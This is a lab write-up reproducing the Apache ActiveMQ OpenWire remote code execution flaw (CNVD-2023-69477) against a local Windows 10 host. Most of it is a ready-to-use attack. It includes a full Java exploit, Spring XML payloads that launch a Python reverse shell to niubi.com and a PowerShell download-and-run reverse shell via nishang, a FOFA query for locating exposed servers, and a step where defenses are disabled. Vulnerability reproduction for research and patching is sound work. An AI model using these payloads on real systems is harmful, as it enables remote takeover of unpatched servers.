Apache ActiveMQ remote code execution RCE vulnerability recurrence (CNVD-2023-69477)
The vulnerability that was discovered last week is a good time to reproduce it and record it.
1. Vulnerability description
? A remote code execution vulnerability exists in Apache ActiveMQ. A remote attacker with access to the Apache ActiveMQ server TCP port (default is 61616) can execute arbitrary code by sending malicious data to the server.
Affected version
Apache ActiveMQ < 5.18.3
Apache ActiveMQ < 5.17.6
Apache ActiveMQ < 5.16.7
Apache ActiveMQ < 5.15.16
fofa syntax:
app="APACHE-ActiveMQ" & amp; & amp; port="61616"
2. Environment setup
? Here I reproduced it locally, using kali and win10
Install ActiveMQ
Visit: https://activemq.apache.org/
and download a vulnerable version.
What I downloaded here is the apache-activemq-5.15.10 version
Unzip and enter the bin directory
use:
activemq start #Start
Visit http://127.0.0.1:8161
and you can see that the environment has started successfully.
3. Vulnerability recurrence
Visit: https://github.com/sincere9/Apache-ActiveMQ-RCE/tree/main/exp
After downloading, enter the /exp folder, see ActiveMQ.java, and modify your IP address, win10:192.168.2.129
,kali192.168.2.131
import java.io.*; import java.net.Socket; public class ActiveMQ { public static void main(final String[] args) throws Exception { System.out.println("[*] Poc for ActiveMQ openwire protocol rce"); String ip = "192.168.2.129"; int port = 61616; String pocxml= "http://192.168.2.131:8000/poc.xml"; Socket sck = new Socket(ip, port); OutputStream os = sck.getOutputStream(); DataOutputStream out = new DataOutputStream(os); out.writeInt(0); //It doesn’t matter out.writeByte(31); //dataType ExceptionResponseMarshaller out.writeInt(1); //CommandId out.writeBoolean(true); //ResponseRequired out.writeInt(1); //CorrelationId out.writeBoolean(true); //use true -> red utf-8 string out.writeBoolean(true); out.writeUTF("org.springframework.context.support.ClassPathXmlApplicationContext"); //use true -> red utf-8 string out.writeBoolean(true); out.writeUTF(pocxml); //call org.apache.activemq.openwire.v1.BaseDataStreamMarshaller#createThrowable cause rce out.close(); os.close(); sck.close(); System.out.println("[*] Target\t" + ip + ":" + port); System.out.println("[*] XML address\t" + pocxml); System.out.println("[*] Payload send success."); } }
Then modify the xml file:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation ="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>python</value> <value>-c</value> <value><![CDATA[import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("niubi.com",9999));os.dup2 (s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash\ ")]]></value> </list> </constructor-arg> </bean> </beans>
Then start the command
python3 -m http.server 8000 #Start http monitoring nc -lvvp 9999 #Listening port javac ActiveMQ.java #Compile java ActiveMQ #Run
However, the poc.xml file is indeed called here but there is no rebound shell.
So try ping dnslog
Modify xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation ="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>ping</value> <value>t1298j.dnslog.cn</value> </list> </constructor-arg> </bean> </beans>
Here we see that the DNSlog platform does have an echo, proving that the command was executed.
So I tried to find a way to rebound the shell. I thought that the Windows rebound shell command might be different, so I used powershell to rebound the shell.
Modify the poc.xml file:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>powershell</value> <value>-c</value> <value><![CDATA[IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke -PowerShellTcp -Reverse -IPAddress 192.168.2.131 -Port 23333]]></value> </list> </constructor-arg> </bean> </beans>
Listen and run exp again
You can see the successful rebound shell
PS: During the shell rebound process, it did not pop up at first, so I entered \apache-activemq-5.15.10\data
, checked the activemq.log log information, and found the termination link.
So I turned off the win10 firewall, defend, etc., turned on the log log4j.logger.org.apache.activemq=DEBUG, and then checked the logs to solve the problem. Only here did I successfully rebound the shell.
4.Bug fix
Currently, officials have fixed this vulnerability by restricting the deserialization class to only be subclasses of Throwable. Affected users are advised to update to:
Apache ActiveMQ >= 5.18.3
Apache ActiveMQ >= 5.17.6
Apache ActiveMQ >= 5.16.7
Apache ActiveMQ >= 5.15.16